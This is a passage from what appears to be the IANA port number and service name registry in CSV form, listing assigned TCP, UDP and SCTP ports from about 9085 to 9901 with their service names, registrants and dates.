Console,[William_LePera],[William_LePera],2008-06-18,,,,, ibm-rsyscon,9085,udp,IBM Remote System Console,[William_LePera],[William_LePera],2008-06-18,,,,, net2display,9086,tcp,Vesa Net2Display,[Kenneth_B_Ocheltree],[Kenneth_B_Ocheltree],2008-01-07,,,,, net2display,9086,udp,Vesa Net2Display,[Kenneth_B_Ocheltree],[Kenneth_B_Ocheltree],2008-01-07,,,,, classic,9087,tcp,Classic Data Server,[Paul_Cadarette],[Paul_Cadarette],2007-01,,,,, classic,9087,udp,Classic Data Server,[Paul_Cadarette],[Paul_Cadarette],2007-01,,,,, sqlexec,9088,tcp,IBM Informix SQL Interface,[Jonathan_Leffler],[Jonathan_Leffler],2005-12,,,,, sqlexec,9088,udp,IBM Informix SQL Interface,[Jonathan_Leffler],[Jonathan_Leffler],2005-12,,,,, sqlexec-ssl,9089,tcp,IBM Informix SQL Interface - Encrypted,[Jonathan_Leffler],[Jonathan_Leffler],2005-12,,,,, sqlexec-ssl,9089,udp,IBM Informix SQL Interface - Encrypted,[Jonathan_Leffler],[Jonathan_Leffler],2005-12,,,,, websm,9090,tcp,WebSM,[I_Hsing_Tsao],[I_Hsing_Tsao],,,,,, websm,9090,udp,WebSM,[I_Hsing_Tsao],[I_Hsing_Tsao],,,,,, xmltec-xmlmail,9091,tcp,xmltec-xmlmail,[Mitch_Kaufman],[Mitch_Kaufman],,,,,, xmltec-xmlmail,9091,udp,xmltec-xmlmail,[Mitch_Kaufman],[Mitch_Kaufman],,,,,, XmlIpcRegSvc,9092,tcp,Xml-Ipc Server Reg,[Casey_Harrington],[Casey_Harrington],2006-01,,,,, XmlIpcRegSvc,9092,udp,Xml-Ipc Server Reg,[Casey_Harrington],[Casey_Harrington],2006-01,,,,, copycat,9093,tcp,Copycat database replication service,[Microtec_Informatique],[Raphael_Neve],2012-03-15,,,,, ,9093,udp,Reserved,,,,,,,, ,9094-9099,,Unassigned,,,,,,,, hp-pdl-datastr,9100,tcp,PDL Data Streaming Port,[Shivaun_Albright],[Shivaun_Albright],2002-04,,,,, hp-pdl-datastr,9100,udp,PDL Data Streaming Port,[Shivaun_Albright],[Shivaun_Albright],2002-04,,,,, pdl-datastream,9100,tcp,Printer PDL Data Stream,[Stuart_Cheshire_4],[Stuart_Cheshire_4],2002-09,,,,,"The protocol name ""pdl-datastream"" is primarily registered for use in DNS SRV records (RFC 2782). DNS SRV records allow a protocol to run on any port number, but the default port for this protocol is 9100." pdl-datastream,9100,udp,Printer PDL Data Stream,[Stuart_Cheshire_4],[Stuart_Cheshire_4],2002-09,,,,,"The protocol name ""pdl-datastream"" is primarily registered for use in DNS SRV records (RFC 2782). DNS SRV records allow a protocol to run on any port number, but the default port for this protocol is 9100." bacula-dir,9101,tcp,Bacula Director,[Kern_Sibbald],[Kern_Sibbald],2002-01,,,,, bacula-dir,9101,udp,Bacula Director,[Kern_Sibbald],[Kern_Sibbald],2002-01,,,,, bacula-fd,9102,tcp,Bacula File Daemon,[Kern_Sibbald],[Kern_Sibbald],2002-01,,,,, bacula-fd,9102,udp,Bacula File Daemon,[Kern_Sibbald],[Kern_Sibbald],2002-01,,,,, bacula-sd,9103,tcp,Bacula Storage Daemon,[Kern_Sibbald],[Kern_Sibbald],2002-01,,,,, bacula-sd,9103,udp,Bacula Storage Daemon,[Kern_Sibbald],[Kern_Sibbald],2002-01,,,,, peerwire,9104,tcp,PeerWire,[Steven_Gerhardt],[Steven_Gerhardt],2004-02,,,,, peerwire,9104,udp,PeerWire,[Steven_Gerhardt],[Steven_Gerhardt],2004-02,,,,, xadmin,9105,tcp,Xadmin Control Service,,,,,[Ari√´n Huisken 15 June 2009],,, xadmin,9105,udp,Xadmin Control Service,,,,,[Ari√´n Huisken 15 June 2009],,, astergate,9106,tcp,Astergate Control Service,[Ari_Huisken],[Ari_Huisken],2010-01-04,,,,, astergate-disc,9106,udp,Astergate Discovery Service,[Ari_Huisken],[Ari_Huisken],2010-01-04,,,,, astergatefax,9107,tcp,AstergateFax Control Service,[Gijs_Middelkamp],[Gijs_Middelkamp],2010-02-03,,,,, ,9107,udp,Reserved,,,,,,,, ,9108-9118,,Unassigned,,,,,,,, mxit,9119,tcp,MXit Instant Messaging,[Marnus_Freeman],[Marnus_Freeman],2006-02,,,,, mxit,9119,udp,MXit Instant Messaging,[Marnus_Freeman],[Marnus_Freeman],2006-02,,,,, ,9120-9121,,Unassigned,,,,,,,, grcmp,9122,tcp,Global Relay compliant mobile instant messaging protocol,[Global_Relay],[Mike_Sample],2012-11-28,,,,, ,9122,udp,Reserved,,,,,,,, grcp,9123,tcp,Global Relay compliant instant messaging protocol,[Global_Relay],[Mike_Sample],2012-11-28,,,,, ,9123,udp,Reserved,,,,,,,, ,9124-9130,,Unassigned,,,,,,,, dddp,9131,tcp,Dynamic Device Discovery,[Shane_Dick],[Shane_Dick],2005-08,,,,, dddp,9131,udp,Dynamic Device Discovery,[Shane_Dick],[Shane_Dick],2005-08,,,,, ,9132-9159,,Unassigned,,,,,,,, apani1,9160,tcp,apani1,[Neal_Taylor],[Neal_Taylor],,,,,, apani1,9160,udp,apani1,[Neal_Taylor],[Neal_Taylor],,,,,, apani2,9161,tcp,apani2,[Neal_Taylor],[Neal_Taylor],,,,,, apani2,9161,udp,apani2,[Neal_Taylor],[Neal_Taylor],,,,,, apani3,9162,tcp,apani3,[Neal_Taylor],[Neal_Taylor],,,,,, apani3,9162,udp,apani3,[Neal_Taylor],[Neal_Taylor],,,,,, apani4,9163,tcp,apani4,[Neal_Taylor],[Neal_Taylor],,,,,, apani4,9163,udp,apani4,[Neal_Taylor],[Neal_Taylor],,,,,, apani5,9164,tcp,apani5,[Neal_Taylor],[Neal_Taylor],,,,,, apani5,9164,udp,apani5,[Neal_Taylor],[Neal_Taylor],,,,,, ,9165-9190,,Unassigned,,,,,,,, sun-as-jpda,9191,tcp,Sun AppSvr JPDA,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, sun-as-jpda,9191,udp,Sun AppSvr JPDA,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, ,9192-9199,,Unassigned,,,,,,,, wap-wsp,9200,tcp,WAP connectionless session service,[WAP_Forum],[WAP_Forum],,,,,, wap-wsp,9200,udp,WAP connectionless session service,[WAP_Forum],[WAP_Forum],,,,,, wap-wsp-wtp,9201,tcp,WAP session service,[WAP_Forum],[WAP_Forum],,,,,, wap-wsp-wtp,9201,udp,WAP session service,[WAP_Forum],[WAP_Forum],,,,,, wap-wsp-s,9202,tcp,WAP secure connectionless session service,[WAP_Forum],[WAP_Forum],,,,,, wap-wsp-s,9202,udp,WAP secure connectionless session service,[WAP_Forum],[WAP_Forum],,,,,, wap-wsp-wtp-s,9203,tcp,WAP secure session service,[WAP_Forum],[WAP_Forum],,,,,, wap-wsp-wtp-s,9203,udp,WAP secure session service,[WAP_Forum],[WAP_Forum],,,,,, wap-vcard,9204,tcp,WAP vCard,[WAP_Forum],[WAP_Forum],,,,,, wap-vcard,9204,udp,WAP vCard,[WAP_Forum],[WAP_Forum],,,,,, wap-vcal,9205,tcp,WAP vCal,[WAP_Forum],[WAP_Forum],,,,,, wap-vcal,9205,udp,WAP vCal,[WAP_Forum],[WAP_Forum],,,,,, wap-vcard-s,9206,tcp,WAP vCard Secure,[WAP_Forum],[WAP_Forum],,,,,, wap-vcard-s,9206,udp,WAP vCard Secure,[WAP_Forum],[WAP_Forum],,,,,, wap-vcal-s,9207,tcp,WAP vCal Secure,[WAP_Forum],[WAP_Forum],,,,,, wap-vcal-s,9207,udp,WAP vCal Secure,[WAP_Forum],[WAP_Forum],,,,,, rjcdb-vcards,9208,tcp,rjcdb vCard,[Robert_John_Churchil],[Robert_John_Churchil],2006-01,,,,, rjcdb-vcards,9208,udp,rjcdb vCard,[Robert_John_Churchil],[Robert_John_Churchil],2006-01,,,,, almobile-system,9209,tcp,ALMobile System Service,[Rob_Graber],[Rob_Graber],2006-01,,,,, almobile-system,9209,udp,ALMobile System Service,[Rob_Graber],[Rob_Graber],2006-01,,,,, oma-mlp,9210,tcp,OMA Mobile Location Protocol,[Hans_Rohnert],[Hans_Rohnert],2002-04,,,,, oma-mlp,9210,udp,OMA Mobile Location Protocol,[Hans_Rohnert],[Hans_Rohnert],2002-04,,,,, oma-mlp-s,9211,tcp,OMA Mobile Location Protocol Secure,[Hans_Rohnert],[Hans_Rohnert],2002-04,,,,, oma-mlp-s,9211,udp,OMA Mobile Location Protocol Secure,[Hans_Rohnert],[Hans_Rohnert],2002-04,,,,, serverviewdbms,9212,tcp,Server View dbms access,[Detlef_Rothe],[Detlef_Rothe],2009-05-15,,,,, serverviewdbms,9212,udp,Server View dbms access,[Detlef_Rothe],[Detlef_Rothe],2009-05-15,,,,, serverstart,9213,tcp,ServerStart RemoteControl,[Detlef_Rothe],[Detlef_Rothe],2009-05-15,,,,, serverstart,9213,udp,ServerStart RemoteControl,[Detlef_Rothe],[Detlef_Rothe],2009-05-15,,,,, ipdcesgbs,9214,tcp,IPDC ESG BootstrapService,[Joerg_Heuer],[Joerg_Heuer],2006-02,,,,, ipdcesgbs,9214,udp,IPDC ESG BootstrapService,[Joerg_Heuer],[Joerg_Heuer],2006-02,,,,, insis,9215,tcp,Integrated Setup and Install Service,[Markus_Treinen],[Markus_Treinen],2006-02,,,,, insis,9215,udp,Integrated Setup and Install Service,[Markus_Treinen],[Markus_Treinen],2006-02,,,,, acme,9216,tcp,Aionex Communication Management Engine,[Mark_Sapp],[Mark_Sapp],2006-04,,,,, acme,9216,udp,Aionex Communication Management Engine,[Mark_Sapp],[Mark_Sapp],2006-04,,,,, fsc-port,9217,tcp,FSC Communication Port,[Teijo_Mustonen],[Teijo_Mustonen],2002-03,,,,, fsc-port,9217,udp,FSC Communication Port,[Teijo_Mustonen],[Teijo_Mustonen],2002-03,,,,, ,9218-9221,,Unassigned,,,,,,,, teamcoherence,9222,tcp,QSC Team Coherence,[Ewan_McNab],[Ewan_McNab],2004-11,,,,, teamcoherence,9222,udp,QSC Team Coherence,[Ewan_McNab],[Ewan_McNab],2004-11,,,,, ,9223-9254,,Unassigned,,,,,,,, mon,9255,tcp,Manager On Network,[David_Rouchet],[David_Rouchet],2007-05,,,,, mon,9255,udp,Manager On Network,[David_Rouchet],[David_Rouchet],2007-05,,,,, ,9256-9276,,Unassigned,,,,,,,, traingpsdata,9277,udp,GPS Data transmitted from train to ground network,[Alstom_Transport_Preston],[Paul_Steane],2012-12-14,,,,, ,9277,tcp,Reserved,,,,,,,, pegasus,9278,tcp,Pegasus GPS Platform,[Nestor_A_Diaz],[Nestor_A_Diaz],2009-05-12,,,,, pegasus,9278,udp,Pegasus GPS Platform,[Nestor_A_Diaz],[Nestor_A_Diaz],2009-05-12,,,,, pegasus-ctl,9279,tcp,Pegaus GPS System Control Interface,[Nestor_A_Diaz],[Nestor_A_Diaz],2009-05-12,,,,, pegasus-ctl,9279,udp,Pegaus GPS System Control Interface,[Nestor_A_Diaz],[Nestor_A_Diaz],2009-05-12,,,,, pgps,9280,tcp,Predicted GPS,[Jeremy_Freeman],[Jeremy_Freeman],2008-02-14,,,,, pgps,9280,udp,Predicted GPS,[Jeremy_Freeman],[Jeremy_Freeman],2008-02-14,,,,, swtp-port1,9281,tcp,SofaWare transport port 1,[Amir_Rapson],[Amir_Rapson],2002-02,,,,, swtp-port1,9281,udp,SofaWare transport port 1,[Amir_Rapson],[Amir_Rapson],2002-02,,,,, swtp-port2,9282,tcp,SofaWare transport port 2,[Amir_Rapson],[Amir_Rapson],2002-02,,,,, swtp-port2,9282,udp,SofaWare transport port 2,[Amir_Rapson],[Amir_Rapson],2002-02,,,,, callwaveiam,9283,tcp,CallWaveIAM,[Colin_Kelley],[Colin_Kelley],,,,,, callwaveiam,9283,udp,CallWaveIAM,[Colin_Kelley],[Colin_Kelley],,,,,, visd,9284,tcp,VERITAS Information Serve,[Ravi_Tavakely],[Ravi_Tavakely],2002-02,,,,, visd,9284,udp,VERITAS Information Serve,[Ravi_Tavakely],[Ravi_Tavakely],2002-02,,,,, n2h2server,9285,tcp,N2H2 Filter Service Port,[Jim_Irwin],[Jim_Irwin],2002-02,,,,, n2h2server,9285,udp,N2H2 Filter Service Port,[Jim_Irwin],[Jim_Irwin],2002-02,,,,, ,9286,tcp,Reserved,,,,,,,, n2receive,9286,udp,n2 monitoring receiver,[Peter_van_Dijk],[Peter_van_Dijk],2011-01-10,,,,, cumulus,9287,tcp,Cumulus,[Thomas_Schleu],[Thomas_Schleu],,,,,, cumulus,9287,udp,Cumulus,[Thomas_Schleu],[Thomas_Schleu],,,,,, ,9288-9291,,Unassigned,,,,,,,, armtechdaemon,9292,tcp,ArmTech Daemon,[Rohan_Story],[Rohan_Story],,,,,, armtechdaemon,9292,udp,ArmTech Daemon,[Rohan_Story],[Rohan_Story],,,,,, storview,9293,tcp,StorView Client,[Ryan_Smith],[Ryan_Smith],2006-07,,,,, storview,9293,udp,StorView Client,[Ryan_Smith],[Ryan_Smith],2006-07,,,,, armcenterhttp,9294,tcp,ARMCenter http Service,[Eric_Thiebaut_George],[Eric_Thiebaut_George],2006-04,,,,, armcenterhttp,9294,udp,ARMCenter http Service,[Eric_Thiebaut_George],[Eric_Thiebaut_George],2006-04,,,,, armcenterhttps,9295,tcp,ARMCenter https Service,[Eric_Thiebaut_George],[Eric_Thiebaut_George],2006-04,,,,, armcenterhttps,9295,udp,ARMCenter https Service,[Eric_Thiebaut_George],[Eric_Thiebaut_George],2006-04,,,,, ,9296-9299,,Unassigned,,,,,,,, vrace,9300,tcp,Virtual Racing Service,[Pete_Loeffen],[Pete_Loeffen],2006-10,,,,, vrace,9300,udp,Virtual Racing Service,[Pete_Loeffen],[Pete_Loeffen],2006-10,,,,, ,9301-9305,,Unassigned,,,,,,,, sphinxql,9306,tcp,Sphinx search server (MySQL listener),[Andrew_Aksyonoff],[Andrew_Aksyonoff],2009-10-20,,,,, ,9306,udp,Reserved,,,,,,,, ,9307-9311,,Unassigned,,,,,,,, sphinxapi,9312,tcp,Sphinx search server,[Andrew_Aksyonoff],[Andrew_Aksyonoff],2009-10-20,,,,, ,9312,udp,Reserved,,,,,,,, ,9313-9317,,Unassigned,,,,,,,, secure-ts,9318,tcp,PKIX TimeStamp over TLS,[Niklas_Weiss],[Niklas_Weiss],2004-11,,,,, secure-ts,9318,udp,PKIX TimeStamp over TLS,[Niklas_Weiss],[Niklas_Weiss],2004-11,,,,, ,9319-9320,,Unassigned,,,,,,,, guibase,9321,tcp,guibase,[Yutaka_Ono],[Yutaka_Ono],,,,,, guibase,9321,udp,guibase,[Yutaka_Ono],[Yutaka_Ono],,,,,, ,9322-9342,,Unassigned,,,,,,,, mpidcmgr,9343,tcp,MpIdcMgr,[Yutaka_Ono],[Yutaka_Ono],,,,,, mpidcmgr,9343,udp,MpIdcMgr,[Yutaka_Ono],[Yutaka_Ono],,,,,, mphlpdmc,9344,tcp,Mphlpdmc,[Yutaka_Ono],[Yutaka_Ono],,,,,, mphlpdmc,9344,udp,Mphlpdmc,[Yutaka_Ono],[Yutaka_Ono],,,,,, ,9345,,Unassigned,,,,,,,, ctechlicensing,9346,tcp,C Tech Licensing,[Reed_Copsey_Jr],[Reed_Copsey_Jr],,,,,, ctechlicensing,9346,udp,C Tech Licensing,[Reed_Copsey_Jr],[Reed_Copsey_Jr],,,,,, ,9347-9373,,Unassigned,,,,,,,, fjdmimgr,9374,tcp,fjdmimgr,[Yutaka_Ono],[Yutaka_Ono],,,,,, fjdmimgr,9374,udp,fjdmimgr,[Yutaka_Ono],[Yutaka_Ono],,,,,, ,9375-9379,,Unassigned,,,,,,,, boxp,9380,tcp,Brivs! Open Extensible Protocol,[Danko_Alexeyev],[Danko_Alexeyev],2007-08-08,,,,, boxp,9380,udp,Brivs! Open Extensible Protocol,[Danko_Alexeyev],[Danko_Alexeyev],2007-08-08,,,,, ,9381-9386,,Unassigned,,,,,,,, d2dconfig,9387,tcp,D2D Configuration Service,[Pete_Camble],[Pete_Camble],2008-12-24,,,,, ,9387,udp,Reserved,,,,,,,, d2ddatatrans,9388,tcp,D2D Data Transfer Service,[Pete_Camble],[Pete_Camble],2008-12-24,,,,, ,9388,udp,Reserved,,,,,,,, adws,9389,tcp,Active Directory Web Services,[Nitin_Gupta],[Nitin_Gupta],2008-12-24,,,,, ,9389,udp,Reserved,,,,,,,, otp,9390,tcp,OpenVAS Transfer Protocol,[Tim_Brown],[Tim_Brown],2008-12-24,,,,, ,9390,udp,Reserved,,,,,,,, ,9391-9395,,Unassigned,,,,,,,, fjinvmgr,9396,tcp,fjinvmgr,[Yutaka_Ono],[Yutaka_Ono],,,,,, fjinvmgr,9396,udp,fjinvmgr,[Yutaka_Ono],[Yutaka_Ono],,,,,, mpidcagt,9397,tcp,MpIdcAgt,[Yutaka_Ono],[Yutaka_Ono],,,,,, mpidcagt,9397,udp,MpIdcAgt,[Yutaka_Ono],[Yutaka_Ono],,,,,, ,9398-9399,,Unassigned,,,,,,,, sec-t4net-srv,9400,tcp,Samsung Twain for Network Server,[Dongkeun_Kim],[Dongkeun_Kim],2007-02,,,,, sec-t4net-srv,9400,udp,Samsung Twain for Network Server,[Dongkeun_Kim],[Dongkeun_Kim],2007-02,,,,, sec-t4net-clt,9401,tcp,Samsung Twain for Network Client,[Dongkeun_Kim],[Dongkeun_Kim],2007-02,,,,, sec-t4net-clt,9401,udp,Samsung Twain for Network Client,[Dongkeun_Kim],[Dongkeun_Kim],2007-02,,,,, sec-pc2fax-srv,9402,tcp,Samsung PC2FAX for Network Server,[HyeongBae_Yu],[HyeongBae_Yu],2008-07-31,,,,, sec-pc2fax-srv,9402,udp,Samsung PC2FAX for Network Server,[HyeongBae_Yu],[HyeongBae_Yu],2008-07-31,,,,, ,9403-9417,,Unassigned,,,,,,,, git,9418,tcp,git pack transfer service,[Linus_Torvalds],[Linus_Torvalds],2005-09,,,,, git,9418,udp,git pack transfer service,[Linus_Torvalds],[Linus_Torvalds],2005-09,,,,, ,9419-9442,,Unassigned,,,,,,,, tungsten-https,9443,tcp,WSO2 Tungsten HTTPS,[Afkham_Azeez],[Afkham_Azeez],2006-06,,,,, tungsten-https,9443,udp,WSO2 Tungsten HTTPS,[Afkham_Azeez],[Afkham_Azeez],2006-06,,,,, wso2esb-console,9444,tcp,WSO2 ESB Administration Console HTTPS,[Ruwan_Linton],[Ruwan_Linton],2008-08-20,,,,, wso2esb-console,9444,udp,WSO2 ESB Administration Console HTTPS,[Ruwan_Linton],[Ruwan_Linton],2008-08-20,,,,, mindarray-ca,9445,tcp,MindArray Systems Console Agent,[MINDARRAY_SYSTEMS],[ALPESH_DHAMELIA],2011-10-25,,,,, ,9445,udp,Reserved,,,,,,,, ,9446-9449,,Unassigned,,,,,,,, sntlkeyssrvr,9450,tcp,Sentinel Keys Server,[Martin_Ziskind],[Martin_Ziskind],2008-08-21,,,,, sntlkeyssrvr,9450,udp,Sentinel Keys Server,[Martin_Ziskind],[Martin_Ziskind],2008-08-21,,,,, ,9451-9499,,Unassigned,,,,,,,, ismserver,9500,tcp,ismserver,[Ian_Gordon_3],[Ian_Gordon_3],,,,,, ismserver,9500,udp,ismserver,[Ian_Gordon_3],[Ian_Gordon_3],,,,,, ,9501-9521,,Unassigned,,,,,,,, ,9522,tcp,Reserved,,,,,,,, sma-spw,9522,udp,SMA Speedwire,[SMA_Solar_Techology],[SMA_Solar_Techology],2011-03-08,,,,, ,9523-9534,,Unassigned,,,,,,,, mngsuite,9535,tcp,Management Suite Remote Control,[Trevor_Perkes],[Trevor_Perkes],2010-02-01,,,,, mngsuite,9535,udp,Management Suite Remote Control,[Trevor_Perkes],[Trevor_Perkes],2010-02-01,,,,, laes-bf,9536,tcp,Surveillance buffering function,[Glen_Myers],[Glen_Myers],2007-05,,,,, laes-bf,9536,udp,Surveillance buffering function,[Glen_Myers],[Glen_Myers],2007-05,,,,, ,9537-9554,,Unassigned,,,,,,,, trispen-sra,9555,tcp,Trispen Secure Remote Access,[Jaco_Botha],[Jaco_Botha],2004-11,,,,, trispen-sra,9555,udp,Trispen Secure Remote Access,[Jaco_Botha],[Jaco_Botha],2004-11,,,,, ,9556-9591,,Unassigned,,,,,,,, ldgateway,9592,tcp,LANDesk Gateway,[Alan_Butt],[Alan_Butt],2006-03,,,,, ldgateway,9592,udp,LANDesk Gateway,[Alan_Butt],[Alan_Butt],2006-03,,,,, cba8,9593,tcp,LANDesk Management Agent (cba8),[Trevor_Perkes],[Trevor_Perkes],2010-02-01,,,,, cba8,9593,udp,LANDesk Management Agent (cba8),[Trevor_Perkes],[Trevor_Perkes],2010-02-01,,,,, msgsys,9594,tcp,Message System,[Alan_Butt],[Alan_Butt],,,,,, msgsys,9594,udp,Message System,[Alan_Butt],[Alan_Butt],,,,,, pds,9595,tcp,Ping Discovery Service,[Alan_Butt],[Alan_Butt],,,,,, pds,9595,udp,Ping Discovery Service,[Alan_Butt],[Alan_Butt],,,,,, mercury-disc,9596,tcp,Mercury Discovery,[Paul_Mclachlan],[Paul_Mclachlan],2005-11,,,,, mercury-disc,9596,udp,Mercury Discovery,[Paul_Mclachlan],[Paul_Mclachlan],2005-11,,,,, pd-admin,9597,tcp,PD Administration,[Duk_Loi],[Duk_Loi],2005-11,,,,, pd-admin,9597,udp,PD Administration,[Duk_Loi],[Duk_Loi],2005-11,,,,, vscp,9598,tcp,Very Simple Ctrl Protocol,[Ake_Hedman],[Ake_Hedman],2005-11,,,,, vscp,9598,udp,Very Simple Ctrl Protocol,[Ake_Hedman],[Ake_Hedman],2005-11,,,,, robix,9599,tcp,Robix,[Evan_Rosen],[Evan_Rosen],2005-11,,,,, robix,9599,udp,Robix,[Evan_Rosen],[Evan_Rosen],2005-11,,,,, micromuse-ncpw,9600,tcp,MICROMUSE-NCPW,[Hing_Wing_To_2],[Hing_Wing_To_2],,,,,, micromuse-ncpw,9600,udp,MICROMUSE-NCPW,[Hing_Wing_To_2],[Hing_Wing_To_2],,,,,, ,9601-9611,,Unassigned,,,,,,,, streamcomm-ds,9612,tcp,StreamComm User Directory,[Brian_C_Wiles],[Brian_C_Wiles],,,,,, streamcomm-ds,9612,udp,StreamComm User Directory,[Brian_C_Wiles],[Brian_C_Wiles],,,,,, ,9613,,Unassigned,,,,,,,, iadt-tls,9614,tcp,iADT Protocol over TLS,[Paul_A_Suhler],[Paul_A_Suhler],2009-02-05,,,,, ,9614,udp,Reserved,,,,,,,, ,9615,,Unassigned,,,,,,,, erunbook-agent,9616,tcp,"eRunbook Agent IANA assigned this well-formed service name as a replacement for ""erunbook_agent"".",[Gerhard_Wagner],[Gerhard_Wagner],2009-03-10,,,,, erunbook_agent,9616,tcp,eRunbook Agent,[Gerhard_Wagner],[Gerhard_Wagner],2009-03-10,,,,,"This entry is an alias to ""erunbook-agent"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,9616,udp,Reserved,,,,,,,, erunbook-server,9617,tcp,"eRunbook Server IANA assigned this well-formed service name as a replacement for ""erunbook_server"".",[Gerhard_Wagner],[Gerhard_Wagner],2009-03-10,,,,, erunbook_server,9617,tcp,eRunbook Server,[Gerhard_Wagner],[Gerhard_Wagner],2009-03-10,,,,,"This entry is an alias to ""erunbook-server"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,9617,udp,Reserved,,,,,,,, condor,9618,tcp,Condor Collector Service,[Todd_Tannenbaum],[Todd_Tannenbaum],2008-04-03,,,,, condor,9618,udp,Condor Collector Service,[Todd_Tannenbaum],[Todd_Tannenbaum],2008-04-03,,,,, ,9619-9627,,Unassigned,,,,,,,, odbcpathway,9628,tcp,ODBC Pathway Service,[Adrian_Hungate],[Adrian_Hungate],2007-05,,,,, odbcpathway,9628,udp,ODBC Pathway Service,[Adrian_Hungate],[Adrian_Hungate],2007-05,,,,, uniport,9629,tcp,UniPort SSO Controller,[Adrian_Hungate],[Adrian_Hungate],2007-09-05,,,,, uniport,9629,udp,UniPort SSO Controller,[Adrian_Hungate],[Adrian_Hungate],2007-09-05,,,,, peoctlr,9630,tcp,Peovica Controller,[Adrian_Hungate],[Adrian_Hungate],2009-09-14,,,,, ,9630,udp,Reserved,,,,,,,, peocoll,9631,tcp,Peovica Collector,[Adrian_Hungate],[Adrian_Hungate],2009-09-14,,,,, ,9631,udp,Reserved,,,,,,,, ,9632,tcp,Reserved,,,,,,,, mc-comm,9632,udp,Mobile-C Communications,[David_Ko_2],[David_Ko_2],2009-09-14,,,,, ,9633-9639,,Unassigned,,,,,,,, pqsflows,9640,tcp,ProQueSys Flows Service,[Sarene_Caiazza],[Sarene_Caiazza],2010-04-27,,,,, ,9640,udp,Reserved,,,,,,,, ,9641-9665,,Unassigned,,,,,,,, zoomcp,9666,tcp,Zoom Control Panel Game Server Management,[Zoom_Control_Panel],[Joshua_Pedroza],2014-02-26,,,,, ,9666,udp,Reserved,,,,,,,, xmms2,9667,tcp,Cross-platform Music Multiplexing System,[Juho_Herttua],[Juho_Herttua],2009-04-14,,,,, xmms2,9667,udp,Cross-platform Music Multiplexing System,[Juho_Herttua],[Juho_Herttua],,,,,, tec5-sdctp,9668,tcp,tec5 Spectral Device Control Protocol,[Michael_Muth],[Michael_Muth],2009-05-11,,,,, tec5-sdctp,9668,udp,tec5 Spectral Device Control Protocol,[Michael_Muth],[Michael_Muth],2009-05-11,,,,, ,9669-9693,,Unassigned,,,,,,,, client-wakeup,9694,tcp,T-Mobile Client Wakeup Message,[Michael_Schonborn],[Michael_Schonborn],2009-09-11,,,,, client-wakeup,9694,udp,T-Mobile Client Wakeup Message,[Michael_Schonborn],[Michael_Schonborn],2009-09-11,,,,, ccnx,9695,tcp,Content Centric Networking,[Van_Jacobson_2][Simon_Barber],[Van_Jacobson_2][Simon_Barber],2009-09-29,,,,, ccnx,9695,udp,Content Centric Networking,[Van_Jacobson_2][Simon_Barber],[Van_Jacobson_2][Simon_Barber],2009-09-29,,,,, ,9696-9699,,Unassigned,,,,,,,, board-roar,9700,tcp,Board M.I.T. Service,[Francesco_Rosi],[Francesco_Rosi],2006-01,,,,, board-roar,9700,udp,Board M.I.T. Service,[Francesco_Rosi],[Francesco_Rosi],2006-01,,,,, ,9701-9746,,Unassigned,,,,,,,, l5nas-parchan,9747,tcp,L5NAS Parallel Channel,[Lawrence_J_Dickson],[Lawrence_J_Dickson],2002-03,,,,, l5nas-parchan,9747,udp,L5NAS Parallel Channel,[Lawrence_J_Dickson],[Lawrence_J_Dickson],2002-03,,,,, ,9748-9749,,Unassigned,,,,,,,, board-voip,9750,tcp,Board M.I.T. Synchronous Collaboration,[Francesco_Rosi],[Francesco_Rosi],2006-01,,,,, board-voip,9750,udp,Board M.I.T. Synchronous Collaboration,[Francesco_Rosi],[Francesco_Rosi],2006-01,,,,, ,9751-9752,,Unassigned,,,,,,,, rasadv,9753,tcp,rasadv,[Dave_Thaler_2],[Dave_Thaler_2],,,,,, rasadv,9753,udp,rasadv,[Dave_Thaler_2],[Dave_Thaler_2],,,,,, ,9754-9761,,Unassigned,,,,,,,, tungsten-http,9762,tcp,WSO2 Tungsten HTTP,[Afkham_Azeez],[Afkham_Azeez],2006-06,,,,, tungsten-http,9762,udp,WSO2 Tungsten HTTP,[Afkham_Azeez],[Afkham_Azeez],2006-06,,,,, ,9763-9799,,Unassigned,,,,,,,, davsrc,9800,tcp,WebDav Source Port,[Ethan_Fremen],[Ethan_Fremen],,,,,, davsrc,9800,udp,WebDav Source Port,[Ethan_Fremen],[Ethan_Fremen],,,,,, sstp-2,9801,tcp,Sakura Script Transfer Protocol-2,[Kouichi_Takeda_2],[Kouichi_Takeda_2],,,,,, sstp-2,9801,udp,Sakura Script Transfer Protocol-2,[Kouichi_Takeda_2],[Kouichi_Takeda_2],,,,,, davsrcs,9802,tcp,WebDAV Source TLS/SSL,[Rob_Isaac],[Rob_Isaac],2003-07,,,,, davsrcs,9802,udp,WebDAV Source TLS/SSL,[Rob_Isaac],[Rob_Isaac],2003-07,,,,, ,9803-9874,,Unassigned,,,,,,,, sapv1,9875,tcp,Session Announcement v1,,,,,[RFC2974],,, sapv1,9875,udp,Session Announcement v1,,,,,[RFC2974],,, sd,9876,tcp,Session Director,[Van_Jacobson],[Van_Jacobson],,,,,, ,9877,,Unassigned,,,,,,,, kca-service,9878,udp,The KX509 Kerberized Certificate Issuance Protocol in Use in 2012,[IESG],[IETF_Chair],2012-07-12,,[RFC6717],,,"Historically, this service has been referred to as ""kca_service"", but this service name does not meet the registry requirements." ,9878,tcp,Reserved,,,,,,,, ,9879-9887,,Unassigned,,,,,,,, cyborg-systems,9888,tcp,CYBORG Systems,[Malcolm_Graham],[Malcolm_Graham],,,,,, cyborg-systems,9888,udp,CYBORG Systems,[Malcolm_Graham],[Malcolm_Graham],,,,,, gt-proxy,9889,tcp,Port for Cable network related data proxy or repeater,[Dawei_Qi],[Dawei_Qi],2010-07-07,,,,, gt-proxy,9889,udp,Port for Cable network related data proxy or repeater,[Dawei_Qi],[Dawei_Qi],2010-07-07,,,,, ,9890-9897,,Unassigned,,,,,,,, monkeycom,9898,tcp,MonkeyCom,[Yuji_Kuwabara],[Yuji_Kuwabara],,,,,, monkeycom,9898,udp,MonkeyCom,[Yuji_Kuwabara],[Yuji_Kuwabara],,,,,, ,9899,tcp,Reserved,,,,2013-04-10,,,, sctp-tunneling,9899,udp,SCTP TUNNELING,[IESG],[IETF_Chair],,2013-04-10,[RFC6951],,, iua,9900,tcp,IUA,[Lyndon_Ong_2],[Lyndon_Ong_2],,,,,, iua,9900,udp,IUA,[Lyndon_Ong_2],[Lyndon_Ong_2],,,,,, iua,9900,sctp,IUA,[Lyndon_Ong_2],[Lyndon_Ong_2],,,,,, enrp,9901,udp,enrp server 